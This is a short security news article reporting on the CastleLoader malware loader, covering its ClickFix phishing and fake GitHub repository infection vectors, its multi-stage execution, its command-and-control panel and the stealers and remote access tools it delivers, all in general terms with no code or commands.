CastleLoader Malware Compromises Over 400 Devices Through Cloudflare-Themed ClickFix Phishing Attack

CastleLoader, a sophisticated malware loader that emerged in early 2025, has successfully compromised 469 devices out of 1,634 infection attempts since May 2025, resulting in an alarming 28.7% infection rate. This versatile threat primarily targets U.S. government entities through advanced phishing campaigns that exploit user trust in legitimate platforms and services. The malware employs two primary infection vectors to deceive victims into executing malicious code. The first method utilises ClickFix phishing techniques themed around Cloudflare services, where attackers create fraudulent domains that mimic trusted platforms such as software development libraries, Google Meet, or browser update notifications. These deceptive pages display fabricated error messages or CAPTCHA prompts, manipulating users into executing malicious PowerShell commands via the Windows Run prompt. Additionally, CastleLoader leverages fake GitHub repositories disguised as legitimate software tools, with one notable example being a repository masquerading as SQL Server Management Studio (SSMS-lib), which exploits developers’ trust in GitHub to distribute malicious installers that connect to command-and-control servers.

The technical architecture of CastleLoader showcases its sophistication through a multi-stage execution process that utilises PowerShell and AutoIT scripts. Following initial compromise, the AutoIT component loads shellcode directly into system memory as a Dynamic Link Library (DLL), subsequently resolving hashed DLL names and API calls to establish communication with one of seven distinct command-and-control servers. The malware operators manage their infrastructure through a comprehensive web-based control panel that provides detailed victim telemetry, including unique identifiers, IP addresses, and comprehensive system information. This panel features specialised modules for payload management and precise distribution control, supporting geographic targeting capabilities and encrypted Docker containers to enhance operational security and evade detection mechanisms. CastleLoader’s versatility is further demonstrated by its ability to deploy various secondary threats, including StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, and HijackLoader, which serve different malicious purposes such as credential harvesting and establishing persistent backdoor access. 

Categories: Malware Loader, Phishing Attacks, Command-and-Control Infrastructure 

Tags: CastleLoader, Malware, Infection Rate, Phishing Campaigns, PowerShell, Command-and-Control, Payload Delivery, GitHub Repositories, Credential Harvesting, Cyber Security